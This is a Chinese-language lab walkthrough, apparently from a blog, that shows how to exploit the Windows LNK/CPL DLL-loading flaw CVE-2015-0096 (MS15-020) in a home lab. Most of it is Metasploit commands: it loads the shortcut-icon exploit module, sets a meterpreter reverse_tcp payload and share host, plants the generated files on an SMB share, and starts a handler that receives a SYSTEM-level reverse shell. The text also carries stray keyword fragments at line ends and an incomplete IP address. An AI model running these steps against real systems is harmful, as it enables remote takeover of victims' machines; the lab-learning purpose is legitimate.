名称:Microsoft DLL植入远程代码执行漏洞(CVE-2015-0096)(MS15-020)linux
了解:Microsoft Windows没有正确处理DLL文件的加载,存在远程代码执行漏洞,经过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞,shell
成功利用后可致使加载任意库。Windows使用.lnk来定义文件或者目录的快捷方式,能够使用.CPL文件来自定义图标。问题是,在Windows中,图标从模块(或者可执行文件或动态连接库)加载。windows
事实上,.cpl文件其实是DLL文件。由于攻击者能够定义哪些可执行模块会被加载,攻击者能够利用.LNK文件来执行任意代码。session
实验环境:tcp
共享主机win7:192.168.1.3 spa
入侵主机linux:192.168.1.7orm
受害者主机XP:192.168.10blog
打开终端输入命令:it
msfconsole //启动msf(metasploit framework)io
search ms15 //搜索关键字相关漏洞
use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader //漏洞利用模块
info //查看漏洞相关信息
set payload windows/meterpreter/reverse_tcp //设置一个反弹shell
设置好参数,设置漏洞利用模块列表的UNCHOST和UNCSHARE
set UNCHOST 192.168.1.3 //我设置为个人另外一台主机地址 就是你开着共享那台机器的地址
set UNCSHARE share //设置共享文件的文件夹 这里主机192.168.1.3在C盘下的share里文件夹开启了共享 提早建立好共享
set LHOST 192.168.1.7 //设置漏洞成功利用后后门链接的地址
exploit //执行漏洞
exploit后会发现生成了几个文件,
咱们去生成的目录下把文件拷贝到共享主机的共享文件夹下
复制到共享主机后,在启动MSF进行配置刚才的后门进行监听...输入命令
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST 192.168.1.7
4. exploit
受害者访问共享后,
成功了触发了漏洞
能够发现入侵者这边弹回来了一个回话session 1,简单点说就是一个后门,这里我顺便提了下权,能够看见system权限。
实验结束,下班,关门,回家。